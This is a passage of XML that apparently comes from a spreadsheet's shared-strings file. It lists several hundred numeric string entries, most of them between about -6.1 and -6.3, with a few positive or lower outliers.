    <t>-6.23385</t>
  </si>
  <si>
    <t>-6.12539</t>
  </si>
  <si>
    <t>-6.14145</t>
  </si>
  <si>
    <t>-6.24951</t>
  </si>
  <si>
    <t>-6.25313</t>
  </si>
  <si>
    <t>-6.25834</t>
  </si>
  <si>
    <t>-6.23630</t>
  </si>
  <si>
    <t>-6.24720</t>
  </si>
  <si>
    <t>-6.91984</t>
  </si>
  <si>
    <t>-6.19851</t>
  </si>
  <si>
    <t>-6.20350</t>
  </si>
  <si>
    <t>-6.23625</t>
  </si>
  <si>
    <t>-6.20476</t>
  </si>
  <si>
    <t>-6.15964</t>
  </si>
  <si>
    <t>-6.16674</t>
  </si>
  <si>
    <t>-6.28081</t>
  </si>
  <si>
    <t>-6.25086</t>
  </si>
  <si>
    <t>-6.26607</t>
  </si>
  <si>
    <t>-6.28000</t>
  </si>
  <si>
    <t>-6.19387</t>
  </si>
  <si>
    <t>-6.14102</t>
  </si>
  <si>
    <t>-6.26050</t>
  </si>
  <si>
    <t>-6.23415</t>
  </si>
  <si>
    <t>-6.23851</t>
  </si>
  <si>
    <t>-6.18275</t>
  </si>
  <si>
    <t>-6.26182</t>
  </si>
  <si>
    <t>-6.25948</t>
  </si>
  <si>
    <t>-6.23142</t>
  </si>
  <si>
    <t>-6.15439</t>
  </si>
  <si>
    <t>-6.26784</t>
  </si>
  <si>
    <t>-6.14671</t>
  </si>
  <si>
    <t>-6.21241</t>
  </si>
  <si>
    <t>-6.23583</t>
  </si>
  <si>
    <t>-6.15441</t>
  </si>
  <si>
    <t>-6.23642</t>
  </si>
  <si>
    <t>-6.18437</t>
  </si>
  <si>
    <t>-6.22115</t>
  </si>
  <si>
    <t>-6.14198</t>
  </si>
  <si>
    <t>-6.20257</t>
  </si>
  <si>
    <t>-6.15144</t>
  </si>
  <si>
    <t>-6.26289</t>
  </si>
  <si>
    <t>-6.13289</t>
  </si>
  <si>
    <t>-6.24274</t>
  </si>
  <si>
    <t>-6.22641</t>
  </si>
  <si>
    <t>-6.13822</t>
  </si>
  <si>
    <t>-6.19820</t>
  </si>
  <si>
    <t>-6.20820</t>
  </si>
  <si>
    <t>-6.17054</t>
  </si>
  <si>
    <t>-6.13665</t>
  </si>
  <si>
    <t>-6.24901</t>
  </si>
  <si>
    <t>-6.20344</t>
  </si>
  <si>
    <t>-6.14644</t>
  </si>
  <si>
    <t>-6.17203</t>
  </si>
  <si>
    <t>-6.17633</t>
  </si>
  <si>
    <t>-6.31631</t>
  </si>
  <si>
    <t>-6.21163</t>
  </si>
  <si>
    <t>-6.29916</t>
  </si>
  <si>
    <t>-6.12978</t>
  </si>
  <si>
    <t>-6.24438</t>
  </si>
  <si>
    <t>-6.26519</t>
  </si>
  <si>
    <t>-6.14867</t>
  </si>
  <si>
    <t>-6.18697</t>
  </si>
  <si>
    <t>-6.13238</t>
  </si>
  <si>
    <t>-6.24162</t>
  </si>
  <si>
    <t>-6.17119</t>
  </si>
  <si>
    <t>-6.22364</t>
  </si>
  <si>
    <t>-6.26334</t>
  </si>
  <si>
    <t>-6.15413</t>
  </si>
  <si>
    <t>-6.14812</t>
  </si>
  <si>
    <t>-6.21440</t>
  </si>
  <si>
    <t>-6.25418</t>
  </si>
  <si>
    <t>-6.25073</t>
  </si>
  <si>
    <t>-6.23125</t>
  </si>
  <si>
    <t>-6.25538</t>
  </si>
  <si>
    <t>-6.23284</t>
  </si>
  <si>
    <t>-6.26680</t>
  </si>
  <si>
    <t>-6.29923</t>
  </si>
  <si>
    <t>-6.14028</t>
  </si>
  <si>
    <t>-6.18281</t>
  </si>
  <si>
    <t>-6.17564</t>
  </si>
  <si>
    <t>-6.24775</t>
  </si>
  <si>
    <t>-6.32701</t>
  </si>
  <si>
    <t>-6.26693</t>
  </si>
  <si>
    <t>-6.24353</t>
  </si>
  <si>
    <t>-6.24932</t>
  </si>
  <si>
    <t>-6.16116</t>
  </si>
  <si>
    <t>-6.23775</t>
  </si>
  <si>
    <t>-6.21717</t>
  </si>
  <si>
    <t>-6.21774</t>
  </si>
  <si>
    <t>-6.22449</t>
  </si>
  <si>
    <t>-6.14448</t>
  </si>
  <si>
    <t>-6.28217</t>
  </si>
  <si>
    <t>-6.19208</t>
  </si>
  <si>
    <t>-6.19364</t>
  </si>
  <si>
    <t>-6.16353</t>
  </si>
  <si>
    <t>-6.20370</t>
  </si>
  <si>
    <t>-6.27350</t>
  </si>
  <si>
    <t>-6.20876</t>
  </si>
  <si>
    <t>-6.20870</t>
  </si>
  <si>
    <t>-6.15651</t>
  </si>
  <si>
    <t>-6.22920</t>
  </si>
  <si>
    <t>-6.18033</t>
  </si>
  <si>
    <t>-6.22896</t>
  </si>
  <si>
    <t>-6.17374</t>
  </si>
  <si>
    <t>-6.32282</t>
  </si>
  <si>
    <t>-6.17424</t>
  </si>
  <si>
    <t>-6.14675</t>
  </si>
  <si>
    <t>-6.16344</t>
  </si>
  <si>
    <t>-6.23013</t>
  </si>
  <si>
    <t>-6.15678</t>
  </si>
  <si>
    <t>-6.18726</t>
  </si>
  <si>
    <t>-6.23072</t>
  </si>
  <si>
    <t>-6.19796</t>
  </si>
  <si>
    <t>-6.15032</t>
  </si>
  <si>
    <t>-6.18816</t>
  </si>
  <si>
    <t>-6.22049</t>
  </si>
  <si>
    <t>-6.18652</t>
  </si>
  <si>
    <t>-6.19868</t>
  </si>
  <si>
    <t>-6.27269</t>
  </si>
  <si>
    <t>-6.23981</t>
  </si>
  <si>
    <t>-6.11418</t>
  </si>
  <si>
    <t>-6.16383</t>
  </si>
  <si>
    <t>-6.28835</t>
  </si>
  <si>
    <t>-6.14586</t>
  </si>
  <si>
    <t>-6.23731</t>
  </si>
  <si>
    <t>-6.19604</t>
  </si>
  <si>
    <t>-6.22375</t>
  </si>
  <si>
    <t>-6.18352</t>
  </si>
  <si>
    <t>-6.27625</t>
  </si>
  <si>
    <t>-6.11664</t>
  </si>
  <si>
    <t>-6.20009</t>
  </si>
  <si>
    <t>-6.11273</t>
  </si>
  <si>
    <t>-6.15343</t>
  </si>
  <si>
    <t>-6.19959</t>
  </si>
  <si>
    <t>-6.23297</t>
  </si>
  <si>
    <t>-6.24437</t>
  </si>
  <si>
    <t>-6.18285</t>
  </si>
  <si>
    <t>-6.14579</t>
  </si>
  <si>
    <t>-6.18196</t>
  </si>
  <si>
    <t>-6.23501</t>
  </si>
  <si>
    <t>-6.20768</t>
  </si>
  <si>
    <t>-6.14894</t>
  </si>
  <si>
    <t>-6.25092</t>
  </si>
  <si>
    <t>-6.16931</t>
  </si>
  <si>
    <t>-6.17375</t>
  </si>
  <si>
    <t>-6.15868</t>
  </si>
  <si>
    <t>-6.18526</t>
  </si>
  <si>
    <t>-6.24612</t>
  </si>
  <si>
    <t>-6.21588</t>
  </si>
  <si>
    <t>-6.15935</t>
  </si>
  <si>
    <t>-6.16321</t>
  </si>
  <si>
    <t>-6.26179</t>
  </si>
  <si>
    <t>-6.24183</t>
  </si>
  <si>
    <t>-6.20779</t>
  </si>
  <si>
    <t>-6.26831</t>
  </si>
  <si>
    <t>-6.15233</t>
  </si>
  <si>
    <t>-6.27829</t>
  </si>
  <si>
    <t>-6.21137</t>
  </si>
  <si>
    <t>-6.16217</t>
  </si>
  <si>
    <t>-6.27682</t>
  </si>
  <si>
    <t>-6.23326</t>
  </si>
  <si>
    <t>-6.11413</t>
  </si>
  <si>
    <t>-6.23080</t>
  </si>
  <si>
    <t>-6.15434</t>
  </si>
  <si>
    <t>-6.23953</t>
  </si>
  <si>
    <t>-6.14429</t>
  </si>
  <si>
    <t>-6.15616</t>
  </si>
  <si>
    <t>-6.25095</t>
  </si>
  <si>
    <t>-6.19363</t>
  </si>
  <si>
    <t>-6.15992</t>
  </si>
  <si>
    <t>-6.18008</t>
  </si>
  <si>
    <t>-6.16883</t>
  </si>
  <si>
    <t>-6.19740</t>
  </si>
  <si>
    <t>-6.15951</t>
  </si>
  <si>
    <t>-6.23786</t>
  </si>
  <si>
    <t>-6.28336</t>
  </si>
  <si>
    <t>-6.18287</t>
  </si>
  <si>
    <t>-6.17443</t>
  </si>
  <si>
    <t>-6.23861</t>
  </si>
  <si>
    <t>-6.24203</t>
  </si>
  <si>
    <t>-6.14816</t>
  </si>
  <si>
    <t>-6.12810</t>
  </si>
  <si>
    <t>-6.15209</t>
  </si>
  <si>
    <t>-6.13673</t>
  </si>
  <si>
    <t>-6.19965</t>
  </si>
  <si>
    <t>-6.19731</t>
  </si>
  <si>
    <t>-6.16833</t>
  </si>
  <si>
    <t>-6.14942</t>
  </si>
  <si>
    <t>-6.26031</t>
  </si>
  <si>
    <t>-6.28174</t>
  </si>
  <si>
    <t>-6.24682</t>
  </si>
  <si>
    <t>-6.25148</t>
  </si>
  <si>
    <t>-6.13593</t>
  </si>
  <si>
    <t>-6.14306</t>
  </si>
  <si>
    <t>-6.18847</t>
  </si>
  <si>
    <t>-6.24251</t>
  </si>
  <si>
    <t>-6.17778</t>
  </si>
  <si>
    <t>-6.13585</t>
  </si>
  <si>
    <t>-6.28442</t>
  </si>
  <si>
    <t>-6.16122</t>
  </si>
  <si>
    <t>-6.19108</t>
  </si>
  <si>
    <t>-6.17401</t>
  </si>
  <si>
    <t>-6.26684</t>
  </si>
  <si>
    <t>-6.17344</t>
  </si>
  <si>
    <t>-6.25016</t>
  </si>
  <si>
    <t>-6.23114</t>
  </si>
  <si>
    <t>-6.13592</t>
  </si>
  <si>
    <t>-6.16784</t>
  </si>
  <si>
    <t>-6.20375</t>
  </si>
  <si>
    <t>-6.23561</t>
  </si>
  <si>
    <t>-6.25242</t>
  </si>
  <si>
    <t>-6.16437</t>
  </si>
  <si>
    <t>-6.21054</t>
  </si>
  <si>
    <t>-6.22979</t>
  </si>
  <si>
    <t>-6.22621</t>
  </si>
  <si>
    <t>-6.20778</t>
  </si>
  <si>
    <t>-6.22833</t>
  </si>
  <si>
    <t>-6.23928</t>
  </si>
  <si>
    <t>-6.20379</t>
  </si>
  <si>
    <t>-6.28235</t>
  </si>
  <si>
    <t>-6.18623</t>
  </si>
  <si>
    <t>-6.25251</t>
  </si>
  <si>
    <t>-6.23997</t>
  </si>
  <si>
    <t>-6.23099</t>
  </si>
  <si>
    <t>-6.24325</t>
  </si>
  <si>
    <t>-6.17180</t>
  </si>
  <si>
    <t>-6.18814</t>
  </si>
  <si>
    <t>-6.15843</t>
  </si>
  <si>
    <t>-6.22135</t>
  </si>
  <si>
    <t>-6.28701</t>
  </si>
  <si>
    <t>-6.27185</t>
  </si>
  <si>
    <t>-6.24666</t>
  </si>
  <si>
    <t>-6.29587</t>
  </si>
  <si>
    <t>-6.15372</t>
  </si>
  <si>
    <t>-6.21893</t>
  </si>
  <si>
    <t>-6.20765</t>
  </si>
  <si>
    <t>-6.27864</t>
  </si>
  <si>
    <t>-6.16856</t>
  </si>
  <si>
    <t>-6.17776</t>
  </si>
  <si>
    <t>-6.17013</t>
  </si>
  <si>
    <t>-6.16920</t>
  </si>
  <si>
    <t>-6.24456</t>
  </si>
  <si>
    <t>-6.21301</t>
  </si>
  <si>
    <t>-6.17492</t>
  </si>
  <si>
    <t>-6.29576</t>
  </si>
  <si>
    <t>-6.15280</t>
  </si>
  <si>
    <t>-6.16261</t>
  </si>
  <si>
    <t>-6.33305</t>
  </si>
  <si>
    <t>-6.16691</t>
  </si>
  <si>
    <t>-6.24844</t>
  </si>
  <si>
    <t>-6.24337</t>
  </si>
  <si>
    <t>-6.14250</t>
  </si>
  <si>
    <t>-6.25808</t>
  </si>
  <si>
    <t>-6.17810</t>
  </si>
  <si>
    <t>-6.24496</t>
  </si>
  <si>
    <t>-6.28294</t>
  </si>
  <si>
    <t>-6.17712</t>
  </si>
  <si>
    <t>-6.23847</t>
  </si>
  <si>
    <t>-6.14647</t>
  </si>
  <si>
    <t>-6.23381</t>
  </si>
  <si>
    <t>-6.27309</t>
  </si>
  <si>
    <t>-6.25116</t>
  </si>
  <si>
    <t>-6.24403</t>
  </si>
  <si>
    <t>-6.15720</t>
  </si>
  <si>
    <t>-6.16760</t>
  </si>
  <si>
    <t>-6.26991</t>
  </si>
  <si>
    <t>-6.17135</t>
  </si>
  <si>
    <t>-6.20846</t>
  </si>
  <si>
    <t>-6.21520</t>
  </si>
  <si>
    <t>-6.24359</t>
  </si>
  <si>
    <t>-6.17036</t>
  </si>
  <si>
    <t>-6.21878</t>
  </si>
  <si>
    <t>-6.22053</t>
  </si>
  <si>
    <t>-6.20852</t>
  </si>
  <si>
    <t>-6.24732</t>
  </si>
  <si>
    <t>-6.32703</t>
  </si>
  <si>
    <t>-6.13270</t>
  </si>
  <si>
    <t>-6.15583</t>
  </si>
  <si>
    <t>-6.27143</t>
  </si>
  <si>
    <t>-6.32181</t>
  </si>
  <si>
    <t>-6.18837</t>
  </si>
  <si>
    <t>-6.17080</t>
  </si>
  <si>
    <t>-6.15336</t>
  </si>
  <si>
    <t>-6.15225</t>
  </si>
  <si>
    <t>-6.22851</t>
  </si>
  <si>
    <t>-6.31547</t>
  </si>
  <si>
    <t>-6.21059</t>
  </si>
  <si>
    <t>-6.23476</t>
  </si>
  <si>
    <t>-6.13135</t>
  </si>
  <si>
    <t>-6.21512</t>
  </si>
  <si>
    <t>-6.11757</t>
  </si>
  <si>
    <t>-6.27909</t>
  </si>
  <si>
    <t>-6.20268</t>
  </si>
  <si>
    <t>-6.21933</t>
  </si>
  <si>
    <t>-6.15553</t>
  </si>
  <si>
    <t>-6.17301</t>
  </si>
  <si>
    <t>-6.22643</t>
  </si>
  <si>
    <t>-6.29096</t>
  </si>
  <si>
    <t>-6.26766</t>
  </si>
  <si>
    <t>-6.26029</t>
  </si>
  <si>
    <t>-6.27821</t>
  </si>
  <si>
    <t>-6.17468</t>
  </si>
  <si>
    <t>-6.15025</t>
  </si>
  <si>
    <t>-6.17363</t>
  </si>
  <si>
    <t>-6.20706</t>
  </si>
  <si>
    <t>-6.21187</t>
  </si>
  <si>
    <t>-6.21453</t>
  </si>
  <si>
    <t>-6.19793</t>
  </si>
  <si>
    <t>-6.25967</t>
  </si>
  <si>
    <t>-6.19306</t>
  </si>
  <si>
    <t>-6.31629</t>
  </si>
  <si>
    <t>-6.18414</t>
  </si>
  <si>
    <t>-6.31905</t>
  </si>
  <si>
    <t>-6.13956</t>
  </si>
  <si>
    <t>-6.15445</t>
  </si>
  <si>
    <t>-6.23488</t>
  </si>
  <si>
    <t>-6.13902</t>
  </si>
  <si>
    <t>-6.16024</t>
  </si>
  <si>
    <t>-6.19686</t>
  </si>
  <si>
    <t>-6.22873</t>
  </si>
  <si>
    <t>-6.16863</t>
  </si>
  <si>
    <t>-6.16710</t>
  </si>
  <si>
    <t>-6.14423</t>
  </si>
  <si>
    <t>-6.32511</t>
  </si>
  <si>
    <t>-6.15212</t>
  </si>
  <si>
    <t>-6.16141</t>
  </si>
  <si>
    <t>-6.20705</t>
  </si>
  <si>
    <t>-6.27995</t>
  </si>
  <si>
    <t>-6.16046</t>
  </si>
  <si>
    <t>-6.23427</t>
  </si>
  <si>
    <t>-6.20933</t>
  </si>
  <si>
    <t>-6.12313</t>
  </si>
  <si>
    <t>-6.27273</t>
  </si>
  <si>
    <t>-6.21249</t>
  </si>
  <si>
    <t>-6.14089</t>
  </si>
  <si>
    <t>-6.15982</t>
  </si>
  <si>
    <t>-6.24188</t>
  </si>
  <si>
    <t>-6.17512</t>
  </si>
  <si>
    <t>-6.16469</t>
  </si>
  <si>
    <t>-6.29271</t>
  </si>
  <si>
    <t>-6.16954</t>
  </si>
  <si>
    <t>-6.27079</t>
  </si>
  <si>
    <t>-6.18579</t>
  </si>
  <si>
    <t>-6.24888</t>
  </si>
  <si>
    <t>-6.14597</t>
  </si>
  <si>
    <t>-6.25501</t>
  </si>
  <si>
    <t>-6.16402</t>
  </si>
  <si>
    <t>-6.31458</t>
  </si>
  <si>
    <t>-6.18699</t>
  </si>
  <si>
    <t>-6.23011</t>
  </si>
  <si>
    <t>-6.13537</t>
  </si>
  <si>
    <t>-6.12907</t>
  </si>
  <si>
    <t>-6.24662</t>
  </si>
  <si>
    <t>-6.26191</t>
  </si>
  <si>
    <t>-6.16537</t>
  </si>
  <si>
    <t>-6.15765</t>
  </si>
  <si>
    <t>-6.13248</t>
  </si>
  <si>
    <t>-6.18316</t>
  </si>
  <si>
    <t>-6.22358</t>
  </si>
  <si>
    <t>-6.15329</t>
  </si>
  <si>
    <t>-6.17142</t>
  </si>
  <si>
    <t>-6.19312</t>
  </si>
  <si>
    <t>-6.12524</t>
  </si>
  <si>
    <t>-6.14216</t>
  </si>
  <si>
    <t>-6.18572</t>
  </si>
  <si>
    <t>-6.18537</t>
  </si>
  <si>
    <t>-6.29220</t>
  </si>
  <si>
    <t>-6.29581</t>
  </si>
  <si>
    <t>-6.16668</t>
  </si>
  <si>
    <t>2.19266</t>
  </si>
  <si>
    <t>-6.17391</t>
  </si>
  <si>
    <t>-6.16077</t>
  </si>
  <si>
    <t>-6.31695</t>
  </si>
  <si>
    <t>-6.19003</t>
  </si>
  <si>
    <t>-6.15119</t>
  </si>
  <si>
    <t>-6.14754</t>
  </si>
  <si>
    <t>-6.17956</t>
  </si>
  <si>
    <t>-6.16980</t>
  </si>
  <si>
    <t>-6.28756</t>
  </si>
  <si>
    <t>-6.16053</t>
  </si>
  <si>
    <t>-6.24825</t>
  </si>
  <si>
    <t>-6.11026</t>
  </si>
  <si>
    <t>-6.23645</t>
  </si>
  <si>
    <t>-6.16910</t>
  </si>
  <si>
    <t>-6.17178</t>
  </si>
  <si>
    <t>-6.16630</t>
  </si>
  <si>
    <t>-6.17451</t>
  </si>
  <si>
    <t>-6.15506</t>
  </si>
  <si>
    <t>-6.19358</t>
  </si>
  <si>
    <t>-6.26304</t>
  </si>
  <si>
    <t>-6.11464</t>
  </si>
  <si>
    <t>-6.16488</t>
  </si>
  <si>
    <t>-6.22576</t>
  </si>
  <si>
    <t>-6.24597</t>
  </si>
  <si>
    <t>-6.21777</t>
  </si>
  <si>
    <t>-6.23733</t>
  </si>
  <si>
    <t>-6.17452</t>
  </si>
  <si>
    <t>-6.21935</t>
  </si>
  <si>
    <t>-6.18303</t>
  </si>
  <si>
    <t>-6.16740</t>
  </si>
  <si>
    <t>-6.21755</t>
  </si>
  <si>
    <t>-6.19532</t>
  </si>
  <si>
    <t>-6.21855</t>
  </si>
  <si>
    <t>-6.34148</t>
  </si>
  <si>
    <t>-6.13882</t>
  </si>
  <si>
    <t>-6.37883</t>
  </si>
  <si>
    <t>-6.13498</t>
  </si>
  <si>
    <t>-6.26201</t>
  </si>
  <si>
    <t>-6.13322</t>
  </si>
  <si>
    <t>-6.21978</t>
  </si>
  <si>
    <t>-6.11178</t>
  </si>
  <si>
    <t>-6.23317</t>
  </si>
  <si>
    <t>-6.18013</t>
  </si>
  <si>
    <t>-6.18873</t>
  </si>
  <si>
    <t>-6.13863</t>
  </si>
  <si>
    <t>-6.16627</t>
  </si>
  <si>
    <t>-6.15762</t>
  </si>
  <si>
    <t>-6.19616</t>
  </si>
  <si>
    <t>-6.14838</t>
  </si>
  <si>
    <t>-6.23088</t>
  </si>
  <si>
    <t>-6.12850</t>
  </si>
  <si>
    <t>-6.18543</t>
  </si>
  <si>
    <t>-6.16553</t>
  </si>
  <si>
    <t>-6.24376</t>
  </si>
  <si>
    <t>-6.17055</t>
  </si>
  <si>
    <t>-7.55879</t>
  </si>
  <si>
    <t>-6.24810</t>
  </si>
  <si>
    <t>-6.26576</t>
  </si>
  <si>
    <t>-6.13141</t>
  </si>
  <si>
    <t>-6.89094</t>
  </si>
  <si>
    <t>-6.13483</t>
  </si>
  <si>
    <t>-6.13751</t>
  </si>
  <si>
    <t>-6.24380</t>
  </si>
  <si>
    <t>-6.13340</t>
  </si>
  <si>
    <t>-6.13666</t>
  </si>
  <si>
    <t>-6.13625</t>
  </si>
  <si>
    <t>-6.25360</t>
  </si>
  <si>
    <t>-6.24470</t>
  </si>
  <si>
    <t>-6.18515</t>
  </si>
  <si>
    <t>-6.13684</t>
  </si>
  <si>
    <t>-6.15424</t>
  </si>
  <si>
    <t>-6.15595</t>
  </si>
  <si>
    <t>-6.28599</t>
  </si>
  <si>
    <t>-6.16578</t>
  </si>
  <si>
    <t>-6.19819</t>
  </si>
  <si>
    <t>-7.21586</t>
  </si>
  <si>
    <t>-6.21848</t>
  </si>
  <si>
    <t>-7.75713</t>
  </si>
  <si>
    <t>-8.20748</t>
  </si>
  <si>
    <t>-6.20079</t>
  </si>
  <si>
    <t>-6.12857</t>
  </si>
  <si>
    <t>-6.09738</t>
  </si>
  <si>
    <t>-6.13227</t>
  </si>
  <si>
    <t>-6.88682</t>
  </si>
  <si>
    <t>-6.09694</t>
  </si>
  <si>
    <t>-6.16223</t>
  </si>
  <si>
    <t>-6.29706</t>
  </si>
  <si>
    <t>-6.10772</t>
  </si>
  <si>
    <t>-6.12879</t>
  </si>
  <si>
    <t>-6.12938</t>
  </si>
  <si>
    <t>-6.27356</t>
  </si>
  <si>
    <t>-6.21833</t>
  </si>
  <si>
    <t>-6.11554</t>
  </si>
  <si>
    <t>-6.15533</t>
  </si>
  <si>
    <t>-6.13237</t>
  </si>
  <si>
    <t>-6.27550</t>
  </si>
  <si>
    <t>-6.13533</t>
  </si>
  <si>
    <t>-6.32675</t>
  </si>
  <si>
    <t>-6.21511</t>
  </si>
  <si>
    <t>-6.94862</t>
  </si>
  <si>
    <t>-6.27024</t>
  </si>
  <si>
    <t>-7.25262</t>
  </si>
  <si>
    <t>-6.15807</t>
  </si>
  <si>
    <t>-6.94301</t>
  </si>
  <si>
    <t>-6.95275</t>
  </si>
  <si>
    <t>-6.96370</t>
  </si>
  <si>
    <t>-6.16544</t>
  </si>
  <si>
    <t>-6.26783</t>
  </si>
  <si>
    <t>-6.09719</t>
  </si>
  <si>
    <t>-6.18705</t>
  </si>
  <si>
    <t>-6.25286</t>
  </si>
  <si>
    <t>-6.24678</t>
  </si>
  <si>
    <t>-6.13739</t>
  </si>
  <si>
    <t>-6.16244</t>
  </si>
  <si>
    <t>-6.13314</t>
  </si>
  <si>
    <t>-6.13341</t>
  </si>
  <si>
    <t>-6.25163</t>
  </si>
  <si>
    <t>-6.25171</t>
  </si>
  <si>
    <t>-6.15558</t>
  </si>
  <si>
    <t>-6.35879</t>
  </si>
  <si>
    <t>-6.59197</t>
  </si>
  <si>
    <t>-6.17732</t>
  </si>
  <si>
    <t>-6.16933</t>
  </si>
  <si>
    <t>-6.15107</t>
  </si>
  <si>
    <t>-6.59125</t>
  </si>
  <si>
    <t>-8.17874</t>
  </si>
  <si>
    <t>-6.13219</t>
  </si>
  <si>
    <t>-7.72070</t>
  </si>
  <si>
    <t>-3.33903</t>
  </si>
  <si>
    <t>-6.22876</t>
  </si>
  <si>
    <t>-6.29194</t>
  </si>
  <si>
    <t>-6.29195</t>
  </si>
  <si>
    <t>-6.19163</t>
  </si>
  <si>
    <t>-6.71776</t>
  </si>
  <si>
    <t>-6.16416</t>
  </si>
  <si>
    <t>-6.17318</t>
  </si>
  <si>
    <t>-7.60376</t>
  </si>
  <si>
    <t>-7.74764</t>
  </si>
  <si>
    <t>-6.96996</t>
  </si>
  <si>
    <t>-7.28947</t>
  </si>
  <si>
    <t>-7.32525</t>
  </si>
  <si>
    <t>-6.17968</t>
  </si>
  <si>
    <t>-6.16610</t>
  </si>
  <si>
    <t>-6.09740</t>
  </si>
  <si>
    <t>-6.23165</t>
  </si>
  <si>
    <t>-6.20913</t>
  </si>
  <si>
    <t>-7.30321</t>
  </si>
  <si>
    <t>-7.30603</t>
  </si>
  <si>
    <t>-6.25059</t>
  </si>
  <si>
    <t>-6.25428</t>
  </si>
  <si>
    <t>-6.29508</t>
  </si>
  <si>
    <t>-6.26186</t>
  </si>
  <si>
    <t>-6.33732</t>
  </si>
  <si>
    <t>-6.24109</t>
  </si>
  <si>
    <t>-6.26257</t>
  </si>
  <si>
    <t>-6.30634</t>
  </si>
  <si>
    <t>-6.26922</t>
  </si>
  <si>
    <t>-5.11411</t>
  </si>
  <si>
    <t>-6.23384</t>
  </si>
  <si>
    <t>-7.25675</t>
  </si>
  <si>
    <t>-6.28015</t>
  </si>
  <si>
    <t>-6.42497</t>
  </si>
  <si>
    <t>-6.25426</t>
  </si>
  <si>
    <t>-6.13576</t>
  </si>
  <si>
    <t>-6.19446</t>
  </si>
  <si>
    <t>-6.29957</t>
  </si>
  <si>
    <t>-6.17315</t>
  </si>
  <si>
    <t>-6.26391</t>
  </si>
  <si>
    <t>-6.26215</t>
  </si>
  <si>
    <t>-6.18330</t>
  </si>
  <si>
    <t>-6.24489</t>
  </si>
  <si>
    <t>-7.05333</t>
  </si>
  <si>
    <t>-6.23299</t>
  </si>
  <si>
    <t>-6.17273</t>
  </si>
  <si>
    <t>-6.17296</t>
  </si>
  <si>
    <t>-6.16666</t>
  </si>
  <si>
    <t>-6.22295</t>
  </si>
  <si>
    <t>-6.92228</t>
  </si>
  <si>
    <t>-6.15980</t>
  </si>
  <si>
    <t>-6.17274</t>
  </si>
  <si>
    <t>-6.10249</t>
  </si>
  <si>
    <t>-6.16515</t>
  </si>
  <si>
    <t>-8.53698</t>
  </si>
  <si>
    <t>-2.06896</t>
  </si>
  <si>
    <t>-6.18535</t>
  </si>
  <si>
    <t>-6.17453</t>
  </si>
  <si>
    <t>-6.21925</t>
  </si>
  <si>
    <t>-6.41977</t>
  </si>
  <si>
    <t>-6.94952</t>
  </si>
  <si>
    <t>-6.30355</t>
  </si>
  <si>
    <t>-6.96342</t>
  </si>
  <si>
    <t>-6.96108</t>
  </si>
  <si>
    <t>-6.97970</t>
  </si>
  <si>
    <t>-6.91534</t>
  </si>
  <si>
    <t>-6.95714</t>
  </si>
  <si>
    <t>-6.96267</t>
  </si>
  <si>
    <t>-7.35692</t>
  </si>
  <si>
    <t>-6.97486</t>
  </si>
  <si>
    <t>-6.94678</t>
  </si>
  <si>
    <t>-6.99203</t>
  </si>
  <si>
    <t>-6.96038</t>
  </si>
  <si>
    <t>-6.98456</t>
  </si>
  <si>
    <t>-6.97591</t>
  </si>
  <si>
    <t>-6.98720</t>
  </si>
  <si>
    <t>-6.25823</t>
  </si>
  <si>
    <t>-7.12885</t>
  </si>
  <si>
    <t>-6.18842</t>
  </si>
  <si>
    <t>-6.94316</t>
  </si>
  <si>
    <t>-6.98682</t>
  </si>
  <si>
    <t>-6.15832</t>
  </si>
  <si>
    <t>-6.94318</t>
  </si>
  <si>
    <t>-6.98399</t>
  </si>
  <si>
    <t>-6.17281</t>
  </si>
  <si>
    <t>-6.99417</t>
  </si>
  <si>
    <t>-6.22245</t>
  </si>
  <si>
    <t>-6.34124</t>
  </si>
  <si>
    <t>-6.18664</t>
  </si>
  <si>
    <t>-6.19156</t>
  </si>
  <si>
    <t>-6.19167</t>
  </si>
  <si>
    <t>-6.17311</t>
  </si>
  <si>
    <t>-7.03283</t>
  </si>
  <si>
    <t>-7.30365</t>
  </si>
  <si>
    <t>-6.97656</t>
  </si>
  <si>
    <t>-6.15621</t>
  </si>
  <si>
    <t>-6.24139</t>
  </si>
  <si>
    <t>-6.32115</t>
  </si>
  <si>
    <t>-6.29061</t>
  </si>
  <si>
    <t>-6.31288</t>
  </si>
  <si>
    <t>-6.27487</t>
  </si>
  <si>
    <t>-6.24626</t>
  </si>
  <si>
    <t>-6.24194</t>
  </si>
  <si>
    <t>-6.24210</t>
  </si>
  <si>
    <t>-6.15060</t>
  </si>
  <si>
    <t>-6.23374</t>
  </si>
  <si>
    <t>-6.15044</t>
  </si>
  <si>
    <t>-6.17312</t>
  </si>
  <si>
    <t>-6.18683</t>
  </si>
  <si>
    <t>-6.10768</t>
  </si>
  <si>
    <t>-6.11111</t>
  </si>
  <si>
    <t>-6.20993</t>
  </si>
  <si>
    <t>-6.25024</t>
  </si>
  <si>
    <t>-6.45723</t>
  </si>
  <si>
    <t>-6.45709</t>
  </si>
  <si>
    <t>-6.42250</t>
  </si>
  <si>
    <t>-6.41987</t>
  </si>
  <si>
    <t>5.22695</t>
  </si>
  <si>
    <t>5.24062</t>
  </si>
  <si>
    <t>-6.20860</t>
  </si>
  <si>
    <t>-6.29527</t>
  </si>
  <si>
    <t>-6.18691</t>
  </si>
  <si>
    <t>-6.23093</t>
  </si>
  <si>
    <t>-6.29162</t>
  </si>
  <si>
    <t>-6.27278</t>
  </si>
  <si>
    <t>-6.28548</t>
  </si>
  <si>
    <t>-6.28519</t>
  </si>
  <si>
    <t>-6.28911</t>
  </si>
  <si>
    <t>-6.18684</t>
  </si>
  <si>
    <t>-6.15536</t>
  </si>
  <si>
    <t>-6.25529</t>
  </si>
  <si>
    <t>-6.25900</t>
  </si>
  <si>
    <t>-6.26500</t>
  </si>
  <si>
    <t>-6.26504</t>
  </si>
  <si>
    <t>-6.22004</t>
  </si>
  <si>
    <t>-6.25905</t>
  </si>
  <si>
    <t>-6.27389</t>
  </si>
  <si>
    <t>-6.26669</t>
  </si>
  <si>
    <t>-6.25894</t>
  </si>
  <si>
    <t>-6.18685</t>
  </si>
  <si>
    <t>-6.25550</t>
  </si>
  <si>
    <t>-6.28230</t>
  </si>
  <si>
    <t>-7.02928</t>
  </si>
  <si>
    <t>-6.93288</t>
  </si>
  <si>
    <t>-5.98658</t>
  </si>
  <si>
    <t>-6.01074</t>
  </si>
  <si>
    <t>-6.59495</t>
  </si>
  <si>
    <t>-6.59496</t>
  </si>
  <si>
    <t>5.55935</t>
  </si>
  <si>
    <t>5.55011</t>
  </si>
  <si>
    <t>5.55484</t>
  </si>
  <si>
    <t>5.07030</t>
  </si>
  <si>
    <t>-7.04359</t>
  </si>
  <si>
    <t>-7.09600</t>
  </si>
  <si>
